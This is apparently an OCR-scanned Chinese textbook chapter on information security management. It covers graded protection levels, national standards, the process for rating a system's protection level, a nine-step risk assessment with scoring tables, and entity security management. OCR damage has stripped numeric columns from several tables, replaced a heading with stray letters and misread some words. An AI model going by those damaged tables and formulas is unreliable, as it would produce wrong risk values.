。 自主 保护 级 。 本 级 的 计算 机 信息 系统 对 可 信 计 算 机 通过 隔离 用 户 和 数据 ,使 用 户 具 

备 自主 安全 保护 的 能 力 。 它 具有 多 种 形式 的 控制 能 力 , 对 用 户 实 施 访问 控制 , 即 为 
用 户 提供 可 行 的 手段 ,保护 用 户 和 用 户 组 的 信息 ,避免 其 他 用 户 对 数据 非法 读 写 与 
破坏 。 

。 系统 审计 保护 级 。 与 用 户 自主 保护 级 相 比 ,本 级 的 计算 机 信息 系统 对 可 信 计 算 机 实 
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施 了 粒度 更 细 的 自主 访问 控制 , 它 通过 登录 规程 审计 安全 性 相关 事件 和 隔离 资源 ， 
使 用 户 对 自己 的 行为 负责 。 

。 安全 标记 保护 级 。 本 级 的 计算 机 信息 系统 对 可 信 计 算 机 具有 系统 审计 保护 级 的 所 
有 功能 。 此 外 ,还 提供 有 关 安 全 策略 模型 数据 标记 以 及 主体 对 客体 强制 访问 控制 
的 非 形式 化 描述 ,能 够 准确 地 标记 输出 信息 的 能 力 , 并 消除 通过 测试 发 现 的 任何 
错误 。 

。 结构 化 保护 级 。 本 级 的 计算 机 信息 系统 的 可 信 计 算 机 建立 于 明确 定义 的 形式 化 安 

全 策略 模型 之 上 , 它 要 求 将 第 三 级 系统 中 的 自主 和 强制 访问 控制 扩展 到 所 有 主体 与 

客体 ,此 外 还 要 考虑 隐蔽 通道 。 本 级 的 计算 机 信息 系统 中 的 可 信 计 算 机 必须 结构 化 

为 关键 保护 元 素 和 非 关键 保护 元 素 , 接 口 也 必须 明确 定义 ,使 其 设计 与 实现 能 经 受 

更 充分 的 测试 和 更 完整 的 复审 。 本 级 加 强 了 鉴别 机 制 , 支 持 系 统管 理 员 和 操作 员 的 

职能 ,提供 可 信 设 施 管理 ,增强 了 配置 管理 控制 。 总 之 ,系统 具有 了 相当 的 抗 渗透 

能 力 。 

访问 验证 保护 级 。 本 级 的 计算 机 信息 系统 中 的 可 信 计 算 机 满足 访问 监控 器 需求 。 

访问 监控 器 仲裁 主体 对 客体 的 全 部 访问 。 访 问 监控 器 本 身 是 抗 自 改 的 ,同时 必须 足 

够 小 ,能 够 分 析 和 测试 。 为 了 满足 访问 监控 器 需求 ,可 信 计 算 机 在 构造 时 ,务必 排除 

那些 对 实施 安全 策略 来 说 并 非 必要 的 代码 ,在 设计 和 实现 时 ,应 从 系统 工程 角度 将 

其 复杂 性 降低 到 最 小 程度 。 此 外 , 它 还 支持 安全 管理 员 职 能 ,扩充 了 审计 机 制 , 当 发 

生 与 安全 相关 的 事件 时 发 出 信号 ,并 提供 系统 恢复 机 制 。 系 统 具 有 很 高 的 抗 渗透 

能 力 。 

另外 还 有 《信息 处 理 系 统 开 放 系 统 互联 基本 参考 模型 第 2 部 分 安全 体系 结构 》 
(GB/T 9387. 2 一 1995) 《信息 处 理 数 据 加 密实 体 鉴 别 机 制 第 1 部 分 : 一 般 模 型 》(GB 
15843. 1 一 1995)《 信 息 技术 设备 的 安全 》(GB 4943 一 2011) 等 。 

2.《 信 息 技 术 安全 技术 信息 技术 安全 性 评估 准则 》(GB/T 18336 一 2015) 

GB/T 18336 一 2015《 信 息 技术 ”安全 技术 ”信息 技术 安全 性 评估 准则 ) 是 评估 信息 技 

术 产 品 和 系统 安全 性 的 基础 准则 ,由 于 该 标准 等 同 于 ISO/IEC 15408:1999, 即 CC, 因 此 可 

直接 参考 CC。 


9.3.3 信息 系统 安全 等 级 保护 评定 流程 


信息 安全 等 级 保护 制度 是 国家 信息 安全 保障 工作 的 基本 制度 、 基 本 策略 和 基本 方法 ,是 
促进 信息 化 健康 发 展 ,维护 国家 安全 社会 秩序 和 公共 利益 的 根本 保障 。 国 务 院 法 规 和 中 央 
文件 明确 规定 ,要 实行 信息 安全 等 级 保护 ,重点 保护 基础 信息 网 络 和 关系 国家 安全 、 经 济 命 
脉 ,社会 稳定 等 方面 的 重要 信息 系统 ,抓紧 建立 信息 安全 等 级 保护 制度 。 信 息 安全 等 级 保护 
是 当今 发 达 国家 保护 关键 信息 基础 设施 、 保 障 信息 安全 的 通行 做 法 ,也 是 我 国 多 年 来 信息 安 
全 工作 经 验 的 总 结 。 开 展 信 息 安 全 等 级 保护 工作 不 仅 是 保障 重要 信息 系统 安全 的 重大 措 
施 ,也 是 一 项 事 关 国家 安全 、 社 会 稳定 、 国 家 利益 的 重要 任务 。 

网 络 系 统 运行 维护 组 织 应 按照 国家 有 关 管 理 规范 和 信息 系统 等 级 保护 定 级 指南 的 要 
求 ,确定 信息 系统 的 安全 保护 等 级 。 信 息 系统 安全 保护 等 级 的 确定 具体 可 以 分 成 以 下 3 项 
关键 工作 : 
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。 信息 系统 分 析 。 确 定 信息 系统 的 边界 和 范围 ,形成 信息 系统 总 体 描述 文件 。 
。 安全 保护 等 级 确定 。 依 照 信息 系统 等 级 保护 定 级 指南 的 要 求 ,确定 信息 系统 的 安全 
保护 等 级 ,形成 定 级 报告 和 备案 表 。 
。 专家 评审 。 针 对 信息 系统 的 总 体 描述 材料 、 信 息 系统 的 定 级 报告 和 备案 表 , 聘 请 专 
家 对 定 级 的 准确 性 、 合 规 性 进行 评审 。 

9.3.3.1 信息 系统 分 析 

1. 工作 目标 

在 信息 系统 运行 维护 过 程 中 ,组 织 相关 人 员 处 收集 有 关 信 息 系 统 的 信息 ,对 信息 进行 综 
合 分 析 和 整理 ,依据 分 析 和 整理 的 内 容 形 成 组 织 机 构 内 信息 系统 的 总 体 描述 性 文档 。 

2. 参与 单位 

信息 系统 分 析 阶 段 的 参与 单位 和 各 单位 在 该 阶段 的 工作 职责 如 下 : 

。 总 体 集成 .信息 系统 开发 商 ,负责 提供 基础 性 材料 ,作为 信息 系统 分 析 的 依据 。 

。 信息 系统 运行 维护 组 织 , 负 责 审核 并 确认 信息 系统 描述 的 准确 性 、 范 围 和 边界 。 

。 安全 集成 商 ,负责 协助 整理 信息 系统 识别 的 信息 、 范 围 和 边界 。 

3. 准备 文档 

信息 系统 分 析 阶 段 需要 准备 的 文档 包括 《信息 系统 可 行 性 报告 兴 信 息 系统 需求 规格 说 
明 书 》。 

4. 实施 过 程 

信息 系统 分 析 的 实施 主要 是 收集 信息 系统 的 基本 信息 ,并 对 其 进行 识别 ,主要 包括 以 下 
内 容 : 


2 


。 识别 信息 系统 的 基本 信息 。 
。 识别 信息 系统 的 管理 框架 。 
。 识别 信息 系统 的 网 络 及 设备 部 署 。 
。 识别 信息 系统 的 业务 种 类 和 特性 。 
。 识别 业务 系统 处 理 的 信息 资产 。 
。 识别 用 户 范 围 和 用 户 类 型 。 
。 信息 系统 描述 。 
5. 需要 完成 的 文档 
信息 系统 分 析 阶 段 应 完成 的 主要 文档 有 《信息 系统 安全 等 级 保护 定 级 报告 ) 的 第 一 部 
分 一 一 信息 系统 描述 。 
9.3.3.2 安全 保护 等 级 确定 
1. 工作 目标 
按照 国家 有 关 管 理 规范 和 信息 系统 等 级 保护 定 级 指南 的 要 求 ,确定 信息 系统 的 安全 保 
护 等 级 ,并 对 定 级 结果 进行 审核 和 批准 ,保证 定 级 结果 的 准确 性 。 对 定 级 过 程 中 产生 的 文档 
进行 整理 ,形成 信息 系统 定 级 结果 报告 。 
2. 参与 单位 
安全 保护 等 级 确定 阶段 的 参与 单位 和 各 单位 在 该 阶段 的 工作 职责 如 下 : 
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。 信息 系统 运行 维护 组 织 , 负 责 对 信息 系统 的 安全 保护 等 级 进行 分 析 和 确定 。 
。 总 体 集成 ,信息 系统 开发 商 ,负责 协助 填写 信息 系统 等 级 保护 备案 信息 和 报告 
内 容 。 
。 安全 集成 商 ,负责 协助 解释 和 介绍 定 级 标准 要 求 ,协助 整理 定 级 报告 和 备案 表 。 
3. 准备 文档 
安全 保护 等 确定 阶段 需要 准备 的 文档 包括 《信息 系统 安全 等 级 保护 定 级 报告 和 《信息 
系统 安全 保护 等 级 备案 表 》。 
4. 实施 过 程 
安全 保护 等 级 确定 阶段 的 主要 实施 过 程 如 下 : 
。 信息 系统 安全 保护 等 级 初步 确定 。 根 据 国家 有 关 管 理 规范 确定 的 定 级 方法 ,信息 系 
统 运 行 维护 组 织 对 每 个 定 级 对 象 确定 初步 的 安全 保护 等 级 。 
。 定 级 结果 审核 和 批准 。 信 息 系统 运行 维护 组 织 初步 确定 了 安全 保护 等 级 后 ,有 主管 
部 门 的 ,应 当 经 主管 部 门 审 核 批准 。 运 行 维护 组 织 或 者 主管 部 门 应 当 邀 请 专家 
评审 。 
。 形成 定 级 报告 。 对 信息 系统 的 总 体 描述 文档 .信息 系 统 安全 保护 等 级 确定 结果 等 内 
容 进行 整理 ,形成 文件 化 的 信息 系统 定 级 结果 报告 。 
5. 需要 完成 的 文档 
安全 保护 等 级 确定 阶段 应 完成 的 主要 文档 有 《信息 系统 安全 保护 等 级 定 级 报告 兴 信 息 
系统 安全 保护 等 级 备案 表 》。 
9.3.3.3 专家 评审 
1. 参与 单位 
专家 评审 阶段 的 参与 单位 和 各 单位 在 该 阶段 的 工作 职责 如 下 : 
。 信息 系统 运行 维护 组 织 , 负 责 向 各 级 行政 管理 机 构 提 供 三 级 以 上 ( 含 三 级 ) 的 重要 网 
络 和 信息 系统 的 安全 保护 定 级 报告 及 备案 材料 。 
。 各 级 行政 管理 机 构 ,负责 组 织 专家 对 定 级 报告 进行 评审 。 
2. 准备 文档 
安全 保护 等 确定 阶段 需要 准备 的 文档 包括 三 级 以 上 ( 含 三 级 ) 的 (重要 网 络 和 信息 系统 
的 安全 保护 定 级 报告 ) 及 备案 所 需 相 关 材 料 。 
3. 实施 过 程 
专家 评审 阶段 的 主要 实施 过 程 如 下 : 
。 信息 系统 运行 维护 组 织 聘请 专家 对 定 级 报告 进行 评审 。 
。 按 要 求 向 公安 机 关 备 案 。 
4. 需要 完成 的 文档 
专家 评审 阶段 应 完成 的 主要 文档 有 《信息 系统 安全 保护 等 级 定 级 专家 评审 意见 多 信息 
系统 安全 保护 等 级 定 级 报告 兴 信息 系统 安全 保护 等 级 备案 表 )》。 


第 9 章 安全 管理 与 安全 标准 261 





9.4 安全 风险 管理 


网 络 安全 是 指 全 网 络 的 动态 安全 ,因此 需要 分 步骤 、 分 层次 实施 。 首 先 ,需要 了 解 目前 
的 网 络 安全 状况 , 即 进行 客观 而 全 面 的 安全 评估 。 本 节 从 安全 风险 的 层次 划分 和 安全 风险 
评估 两 个 方面 进行 介绍 。 


9.4.1 安全 风险 的 层次 划分 


在 评估 分 析 风 险 和 制定 安全 措施 的 时 候 , 需 要 有 一 套 较 完整 的 风险 分 析 方 法 和 安全 措 
施 制定 方法 。 可 以 通过 对 系统 划分 层次 来 进行 安全 性 评估 。 即 采取 分 层 分 析 的 方法 ,将 风 
险 分 散 到 整个 系统 的 各 个 层次 ,并 且 在 每 个 层次 上 按 更 细致 的 结构 进行 分 析 。 从 系统 和 应 
用 的 角度 看 ,网 络 安全 风险 可 分 为 5 个 层次 : 物理 层 安 全 风险 、 操 作 系统 层 安 全 风险 、 网 络 
层 安 全 风险 ,应 用 层 安全 风险 以 及 管理 层 安 全 风险 ,如 图 9. 2 所 示 。 

1. 物理 层 安 全 风险 

该 层次 的 安全 风险 包括 评估 通信 线路 的 安全 、 物 理 设 
备 的 安全 、 机 房 的 安全 等 。 物 理 层 安全 主要 体现 在 通信 线 操作 系统 层 安全 风险 





应 用 层 安全 风险 
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路 的 可 靠 性 (线路 备份 网 管 软件 、 传 输 介质 )、 软 硬件 设备 i A 
安全 性 (替换 设备 . 拆 务 设备 .增加 设备 )、 设 备 的 备份 、 防 险 
灾害 和 防 干扰 能 力 、 设 备 的 运行 环境 (温度 、 湿 度 、 烟 尘 )、 物理 层 安全 风险 

不 间断 电源 保障 等 。 


图 9.2 安全 风险 层次 划分 
2. 网 络 层 安全 风险 


该 层次 的 安全 问题 主要 指 网 络 信息 的 安全 性 ,包括 网 
络 层 身 份 认 证 、 网 络 资 源 的 访问 控制 .数据 传输 的 保密 与 完整 性 、 远 程 接 入 的 安全 、 域 名 系统 
的 安全 、 路 由 系统 的 安全 和 入 侵 检 测 等 。 

3. 操作 系统 层 安 全 风险 

该 层次 的 安全 问题 来 自 网 络 服务 器 运行 的 网 络 操 作 系 统 Windows NT/2000 系列 、 
UNIX 系列 .Linux 系列 以 及 其 他 的 专用 操作 系统 等 。 操 作 系 统 层 的 安全 风险 问题 表现 在 
两 方面 : 

。 操作 系统 本 身 的 不 安全 因素 ,主要 包括 身份 认证 ,访问 控制 .系统 漏 洞 等 。 

。 对 操作 系统 的 安全 配置 存在 问题 。 对 于 没有 经 验 的 管理 员 而 言 , 如 何 进行 操作 系统 

的 安全 配置 是 一 个 必须 面 对 的 问题 。 

4. 应 用 层 安 全 风险 

该 层次 的 安全 考虑 业务 网 络 对 用 户 提供 服务 所 采用 的 应 用 软件 和 数据 的 安全 性 ,包括 
数据 库 软件 .Web 服务 .电子 邮件 系统 、 域 名 系统 、 交 换 与 路 由 系统 、 防 火 墙 及 应 用 网 关系 
统 、 业 务 应 用 软件 (如 办 公 系 统 等 ), 以 及 其 他 网 络 服 务 系统 (如 Telnet、FTP) 等 。 


262 网 络 安全 





5. 管理 层 安 全 风险 

安全 管理 包括 安全 技术 和 设备 的 管理 \ 安 全 管理 制度 、 部 门 与 人 员 的 组 织 规则 等 。 管 理 
的 制度 化 程度 极 大 地 影响 着 整个 网 络 的 安全 ,严格 的 安全 管理 制度 、 明 确 的 部 门 安全 职责 划 
分 ,合理 的 人 员 角 色 定 义 都 可 以 在 很 大 程度 上 降低 其 他 层次 的 安全 风险 。 

基于 上 面 划 分 的 5 个 安全 层次 进行 风险 分 析 ,得 到 的 风险 点 列表 能 够 涵盖 整个 系统 , 基 
本 保证 在 分 析 过 程 中 不 会 遗漏 系统 中 大 的 风险 点 ,并 且 可 以 清楚 地 描述 风险 点 的 位 置 及 相 
互 关系 。 


9.4.2 安全 风险 评估 


9.4.2.1 风险 评估 工作 的 实施 频率 和 时 机 

在 实施 风险 评估 工作 前 ,首先 要 明确 评估 工作 的 实施 频率 和 时 机 。 风 险 评估 可 分 为 党 
规 性 评估 和 专项 评估 。 

1. 常规 性 评估 

常规 性 评估 应 符合 周期 性 ,由 网 络 系统 运 维 组 织 根据 网 络 系统 的 重要 程度 ,规模 以 及 相 
关 评 估 工 作 标准 和 法 规 确定 具体 的 评估 周期 。 原 则 上 ,每 年 至 少 应 对 网 络 系统 进行 一 次 全 
面 的 风险 评估 。 

2. 专项 评估 

当 网 络 运行 环境 发 生 了 某 些 重大 变化 时 ,网 络 系统 中 可 能 会 产生 一 些 新 的 风险 。 因 此 
在 定期 开展 常规 性 风险 评估 的 基础 上 ,还 应 积极 开展 专项 风险 评估 。 这 些 重大 变化 可 视 为 
专项 风险 评估 工作 的 启动 条 件 ,主要 包括 : 

。 新 增 了 大 量 信息 资产 。 

。 业务 环境 出 现 了 重大 变化 。 

。 管理 上 出 现 重大 改变 或 者 技术 革新 。 

。 产生 新 的 安全 威胁 ,与 脆弱 性 和 信息 安全 相关 的 法 律 法 规 出 现 变化 等 。 

9.4.2.2 风险 评估 流程 

网 络 系统 运 维 管理 组 织 应 依照 国家 有 关 管 理 规范 和 信息 系统 风险 评估 指南 的 要 求 , 开 
展 网 络 系统 风险 评估 工作 。 风 险 评估 工作 主要 包括 以 下 9 个 步骤 : 识别 信息 资产 ,识别 信 
息 资 产 面临 的 威胁 ,识别 威胁 可 以 利用 的 脆弱 性 ,识别 与 分 析 控 制 措施 有 效 性 ,分 析 信 息 资 
产 的 暴露 等 级 ,评估 威胁 /脆弱 性 对 的 发 生 容易 度 ,分析 风险 的 影响 程度 ,分 析 风险 发 生 的 可 
能 性 ,计算 和 分 析 风 险 大 小 。 

1. 识别 信息 资产 

网 络 系统 中 包含 多 种 信息 资产 ,并 以 多 种 形式 存在 ,如 交换 机 、 路 由 器 .服务器 数据库 、 
文档 、 软 件 程序 以 及 其 他 无 形 的 资产 。 信 息 资 产 对 于 网 络 系统 的 稳定 运行 以 及 不 间断 提供 
各 种 信息 服务 均 具 有 相应 的 价值 与 功能 。 因 此 ,在 进行 风险 评估 工作 中 ,首先 要 确定 网 络 系 
统 中 信息 资产 的 类 别 和 数量 。 

2. 识别 信息 资产 面临 的 威胁 

在 识别 信息 资产 所 面临 的 威胁 时 应 遵循 以 下 原则 和 方法 : 
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。 对 要 保护 的 每 一 项 关键 信息 资产 所 面临 的 威胁 进行 识别 。 

。 威 胁 宜 从 信息 资产 的 所 有 者 、 使 用 者 、 计 划 书 、 信 息 专 家 、 内 部 及 外 部 负责 信息 安全 
的 人 员 或 组 织 处 获得 。 

。 分析 网 络 系统 中 存在 的 威胁 的 种 类 ,确定 威胁 的 分 类 标准 。 

。 综合 威胁 来 源 、 种 类 和 其 他 因素 后 得 出 威胁 列表 。 

。 针对 每 一 项 需要 保护 的 信息 资产 , 找 出 可 能 面临 的 威胁 。 

在 识别 信息 资产 所 面临 的 威胁 时 ,主要 从 以 下 3 个 方面 的 资料 和 信息 来 源 获取 : 

。 通过 历史 信息 安全 事件 报告 或 记录 ,统计 各 种 发 生 过 的 威胁 和 其 发 生 频 率 。 

。 在 评估 对 象 的 实际 环境 中 ,对 威胁 发 生 数 据 的 统计 和 分 析 以 及 对 各 种 日 志 中 威胁 发 
生 的 数据 进行 统计 和 分 析 。 

。 过 去 一 年 或 两 年 来 国际 权威 机 构 、 业 务 关联 供应 商 发 布 的 对 于 整个 行业 安全 威胁 及 
其 发 生 频 率 的 统计 数据 。 

3. 识别 威胁 可 以 利用 的 脆弱 性 

在 识别 威胁 可 以 利用 的 脆弱 性 时 应 遵循 以 下 原则 和 方法 进行 : 

。 识别 容易 被 攻击 者 (或 威胁 源 ) 攻 破 (或 破坏 ) 的 脆弱 性 ,具体 包括 但 不 仅 限 于 基础 设施 中 

的 弱点 控制 中 的 弱点 人员 意 识 上 的 弱点 .系统 中 的 弱点 和 设计 上 的 弱点 等 脆弱 性 。 

应 针对 信息 资产 所 关联 的 物理 环境 、 组 织 、 人 员 ,管理 硬件 软件 ,程序 代码 、 通 信 

设备 等 多 种 可 能 被 威胁 源 所 利用 并 可 能 导致 危害 的 内 容 进行 脆弱 性 识别 。 

。 没有 对 应 威胁 的 脆弱 性 一 般 不 会 造成 风险 , 故 可 不 采取 相应 的 防护 措施 ,但 应 密切 
监视 这 种 潜在 的 风险 。 

。 脆弱 性 不 一 定 均 在 最 初 网 络 建设 过 程 产生 ,信息 资产 的 应 用 方法 或 目的 的 不 同 、 防 
护 措 施 的 不 足 都 可 能 造成 脆弱 性 。 

til 

识别 与 分 析 控 制 措施 有 效 性 时 应 遵循 以 下 原则 和 方法 进行 : 

“ee we 

应 根据 实际 情况 来 评估 控制 措施 的 有 效 性 大 小 ,注意 考虑 并 分 析 控 制 措施 与 已 经 识 

别 出 的 威胁 和 脆弱 性 的 关系 。 


表 9.4 风险 控制 措施 有 效 性 赋值 





控制 措施 有 效 性 描 述 
1 表示 控制 措施 非常 有 效 

表示 控制 措施 有 很 大 程度 的 效果 
表示 控制 措施 基本 有 效 


表示 控制 措施 有 一 定 的 效果 
表示 控制 措施 基本 无 效 或 没有 控制 措施 


on 


5. 分 析 信息 资产 暴露 等 级 
在 分 析 信息 资产 暴露 等 级 时 应 遵循 以 下 原则 和 方法 进行 : 
。 应 使 用 信息 资产 暴露 等 级 来 描述 信息 资产 或 信息 资产 安全 属性 受 损害 的 程度 。 
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。 从 信息 资产 的 保密 性 和 完整 性 以 及 可 用 性 来 评价 信息 资产 的 暴露 等 级 ,评价 基准 如 
表 9.5 和 表 9.6 所 示 。 


表 9.5 根据 保密 性 和 完整 性 的 暴露 等 级 定义 (C 暴露 等 级 ) 
等 级 信息 资产 的 保密 性 和 完整 性 





对 信息 资产 造成 严重 或 完全 损害 ,严重 影响 业务 利润 或 成 败 

对 信息 资产 造成 严重 但 不 完全 损害 ,影响 业务 利润 或 业务 成 败 

中 等 损坏 或 损失 ,影响 到 内 部 业务 实施 ,导致 运作 成 本 增加 或 利润 减少 
低 损害 或 损失 ,影响 内 部 业务 实行 ,但 成 本 的 增加 少 

信息 资产 有 轻微 更 改 或 无 更 改 


Fe ww 中 加 


表 9.6 根据 可 用 性 的 暴露 等 级 定义 (A 暴露 等 级 ) 





等 级 可 用 人 性 描述 
和 停工 实质 性 支持 成 本 或 业务 承诺 被 取消 
4 工作 中 断 支持 成 本 或 业务 承诺 延迟 可 量化 增长 
3 工作 延迟 对 支持 成 本 或 工作 效率 有 显著 的 影响 ,无 可 评定 的 业务 影响 
2 工作 受 干扰 无 可 评定 的 影响 ,支持 或 基础 结构 成 本 有 少量 增加 
1 


由 正常 业务 操作 吸收 对 支持 成 本 ,工作 效率 或 业务 承诺 无 可 评定 的 影响 


。 信 息 资产 的 暴露 等 级 定义 应 按照 上 述 两 种 暴露 等 级 取 值 高 的 进行 设 定 ,具体 如 





表 9.7 所 示 。 
表 9.7 暴露 等 级 的 定义 

等 级 描 ” 述 基 准 

5 信息 资产 遭受 完全 或 极其 严重 的 损害 C 暴露 等 级 或 A 暴露 等 级 至 少 有 一 项 为 5 
4 对 信息 资产 损害 的 程度 很 大 C 暴露 等 级 或 A 暴露 等 级 至 少 有 一 项 为 4 
3 对 信息 资产 损害 的 程度 中 等 C 暴露 等 级 或 A 暴露 等 级 至 少 有 一 项 为 3 
2 对 信息 资产 损害 的 程度 很 小 C 暴露 等 级 或 A 暴露 等 级 至 少 有 一 项 为 2 
对 信息 资产 损害 的 程度 几乎 没有 C 暴露 等 级 和 A 暴露 等 级 都 为 1 


6. 评估 威胁 /脆弱 性 对 的 发 生 容易 度 
在 评估 威胁 /脆弱 性 对 的 发 生 容易 度 时 应 遵循 以 下 原则 和 方法 进行 。 
。 发 生 容易 度 用 来 描述 威胁 利用 脆弱 性 的 容易 程度 。 
。 只 有 当 发 生 容 易 度 与 控制 措施 结合 之 后 才 可 形成 风险 发 生 的 可 能 性 。 
。 根据 信息 资产 不 同 的 安全 属性 分 别 定义 发 生 容易 度 的 等 级 。 
。 将 发 生 容易 度 的 等 级 定义 为 5 级 ,如 表 9.8 所 示 。 

表 9.8 发 生 容易 度 定义 

等 级 描述 





容易 度 高 
容易 度 较 高 
容易 度 中 
容易 度 较 低 
容易 度 低 


Dw 人 a 
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。 针对 软件 的 威胁 /脆弱 性 对 ,以 恶意 代码 /未 及 时 更 新 防 病毒 软件 为 例 ,容易 度 及 其 
描述 如 表 9. 9 所 示 。 


表 9.9 发 生 容易 度 定义 (对 软件 ) 


等 级 描 述 
大 量 攻击 ,已 经 自动 化 ,可 远程 执行 ,利用 方法 已 公布 ,可 匿名 
大 量 攻击 ,可 自动 化 ,可 远程 攻击 ,利用 方法 可 得 到 ,可 匿名 
中 等 数量 攻击 , 难 自动 化 , 难 远程 执行 ,利用 方法 难得 到 ,要 用 户 级 权限 
少量 攻击 , 难 自动 化 , 难 远程 执行 ,利用 方法 难得 到 ,可 能 需 管理 员 权限 
攻击 很 少 ,不 能 自动 化 ,不 能 远程 执行 ,利用 方法 未 公布 , 需 管理 员 权 限 





PNW 人 a 


7. 分 析 风 险 的 影响 度 

在 分 析 影 响 度 时 应 依照 以 下 方法 进行 : 

。 应 使 用 影响 度量 化 威胁 对 脆弱 性 一 次 成 功 攻击 所 产生 的 负面 影响 。 

。 影响 等 级 是 信息 资产 重要 度 等 级 和 暴露 程度 的 乘积 。 

。 暴露 程度 可 由 暴露 等 级 映射 而 来 (如 表 9. 10 所 示 ) ,表示 信息 资产 被 破坏 的 严重 程 
度 。 例 如 ,100% 的 破坏 是 指 信息 资产 被 完全 损害 或 极其 严重 ; 20% 的 破坏 是 指 对 
信息 资产 的 损害 程度 几乎 没有 。 


表 9.10 暴露 等 级 和 暴露 程度 的 对 应 关系 


暴露 等 级 暴露 程度 
100% 
80% 
60% 
40% 
20% 
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。 影响 度 一 信息 资产 重要 度 义 暴露 程度 。 
。 影响 度 为 上 述 相 乘 结果 采用 四 舍 五 人 方法 在 1 一 5 中 取 值 。 若 相 乘 结果 小 于 1, 则 取 
值 为 1 。 

8. 分 析 风 险 发 生 的 可 能 性 

在 分 析 风 险 发 生 可 能 性 时 应 依照 以 下 方法 进行 : 

。 风险 发 生 可 能 性 二 发生 容 易 度 X 控 制 措施 有 效 性 X20%。 

。 发 生 可 能 性 为 上 述 相 乘 结果 采用 四 售 五 人 方法 在 1 一 5 中 取 值 。 若 相 乘 结果 小 于 1， 
则 取 值 为 1 。 

9. 计算 和 分 析 风 险 大 小 

在 计算 分 析 风 险 大 小 时 应 依照 以 下 方法 进行 : 

。 风险 = 影响 度 X 风 险 发 生 可 能 性 。 

。 通过 计算 分 析 得 出 的 风险 量化 分 布 矩 阵 如 图 9. 3 所 示 。 
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图 9.3 风险 量化 分 布 矩 阵 





。 应 将 25 个 风险 等 级 重新 映射 为 高 、 中 、 低 3 个 风险 级 别 ,如 表 9. 11 所 示 , 风 险 量化 
值 为 15( 包 含 15) 以 上 时 表示 高 风险 ,5( 包 含 5) 一 15 表示 中 风险 ,5 以 下 表示 低 





风险 。 
表 9.11 风险 级 别 映射 表 
风险 级 别 风险 量化 值 风险 描述 和 必要 行动 
高 大 于 或 等 于 15 高 风险 ,强烈 要 求 执行 控制 措施 。 现 有 系统 若 要 继续 运行 , 则 必须 尽 
快 部 署 针 对 性 计划 
中 大 于 或 等 于 5 且 小 ”中 风险 ,要 求 部 署 控制 措施 ,必须 在 一 个 合理 的 时 间 段 内 制定 有 关 计 
于 15 划 来 实施 这 些 措施 
低 小 于 5 低 风 险 ,管理 层 须 确定 是 否 还 需要 采取 纠正 行动 或 者 是 否 接受 风险 


9.5 安全 管理 措施 


在 对 系统 的 安全 风险 进行 正确 评估 后 ,安全 管理 既 要 保证 系统 用 户 和 系统 资源 不 被 非 
法 使 用 ,又 要 保证 系统 本 身 不 被 未 经 授权 的 访问 。 安 全 管理 可 以 分 为 技术 管理 和 行政 管理 
两 个 方面 。 技 术 管 理 主要 有 网 络 实体 本 身 的 安全 管理 .保密 设备 与 密 钥 的 安全 管理 。 行 政 
管理 主要 指 安全 组 织 机 构 、 责 任 和 监督 ,业务 运行 安全 和 规章 制度 .人 事 安全 管理 .教育 和 奖 
惩 、 应 急 计划 和 措施 等 。 


9.5.1 实体 安全 管理 


网 络 实体 的 安全 管理 是 一 个 有 关 网 络 维护 .运营 和 管理 信息 的 综合 管理 系统 ,对 于 最 大 
限度 地 利用 网 络 资源 ,确保 网 络 安全 具有 重要 意义 。 它 集 高 度 自动 化 的 信息 收集 、 传 输 、 处 
理 和 存储 于 一 体 , 集 性 能 管理 (主要 提供 对 设备 的 性 能 和 网 络 单元 的 有 效 性 进行 评价 ,包括 
性 能 测试 、 性 能 分 析 和 性 能 控制 等 ,并 提出 评价 报告 )、 故 障 管理 (对 网 络 运 行 和 设备 故障 进 
行 监测 、 隔 离 和 校正 的 管理 ,包括 告警 监测 .故障 定位 、 故 障 修复 和 测试 等 ,并 提出 相应 的 报 
告 ) .配置 管理 (功能 包括 对 网 络 单元 的 配置 .业务 投入 、 网 络 状况 `, 业 务 状 况 等 进行 管理 、 控 
制 和 安装 ,并 提出 相应 的 报告 ) 计 费 管理 (主要 提供 网 络 中 各 种 业务 的 使 用 情况 及 费用 ,并 
提出 相应 的 报告 ) 和 安全 管理 于 一 身 。 

实体 安全 管理 包括 系统 安全 管理 .安全 服务 管理 安全 机 制 管理 .安全 事件 处 理 管理 、 安 
全 审计 管理 和 安全 恢复 管理 等 内 容 。 
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1. 系统 安全 管理 

系统 安全 管理 依据 一 定 的 安全 保密 政策 在 各 级 网 络 中 心 建立 不 同等 级 的 安全 管理 信息 
库 。 此 信息 库 包 含 了 系统 所 需 的 全 部 安全 信息 。 这 些 安全 信息 可 以 是 数据 表格 形式 、 文 档 
形式 、. 嵌 在 系统 软件 或 硬件 中 的 数据 或 规则 等 。 

系统 安全 管理 要 求 保障 管理 协议 和 传送 管理 信息 的 通道 的 安全 ,防止 潜在 的 各 种 安全 
威胁 和 破坏 。 特 别 是 安全 保密 管理 应 用 软件 之 间 的 通信 ,更 应 该 保证 其 安全 性 。 安 全 保密 
管理 应 用 软件 使 用 通信 信息 更 新 安全 管理 信息 库 之 前 ,必须 事先 由 安全 主管 部 门 批 准 。 

系统 安全 管理 必须 做 到 有 效 修改 和 一 致 性 维护 ,以 保证 管理 网 络 的 正常 工作 。 

系统 安全 管理 必须 保证 安全 服务 管理 和 安全 机 制 管理 的 正常 交互 功能 以 及 其 他 管理 功 
能 的 交互 作用 。 

2. 安全 服务 管理 

安全 服务 管理 为 特定 的 安全 服务 确定 和 分 配 安全 保护 目标 ,为 提供 所 需 的 安全 服务 选 
择 特定 的 安全 机 制 。 安 全 服务 和 安全 机 制 必须 符合 一 定 的 安全 管理 协议 ,并 为 安全 主管 部 
门 提供 有 效 的 调用 。 

3. 安全 机 制 管理 

安全 机 制 管理 涉及 各 项 安全 机 制 的 功能 、 参 数 和 协议 的 安全 管理 。 

4. 安全 事件 处 理 管理 

安全 事件 处 理 管理 的 目标 是 确保 将 发 生 的 安全 事件 所 造成 的 损失 降低 到 最 小 程度 。 它 
需要 对 网 络 进行 大 量 的 风险 分 析 和 安全 分 析 , 包 括 明确 资源 状况 .资源 弱点 .预测 事 件 发 生 
的 可 能 性 .事件 损失 的 评估 、 保 险 安 排 ` 故 障 控制 .安全 计划 等 一 系列 工作 。 安 全 事件 处 理 管 
理 要 确定 安全 事件 报告 的 界限 和 远 距 离 报告 的 途径 以 及 处 理 内 容 等 。 

5. 安全 审计 管理 

安全 审计 管理 主要 是 对 安全 事件 的 记录 和 远 距 离 收集 、 启 用 和 终止 被 选 安全 审计 记录 
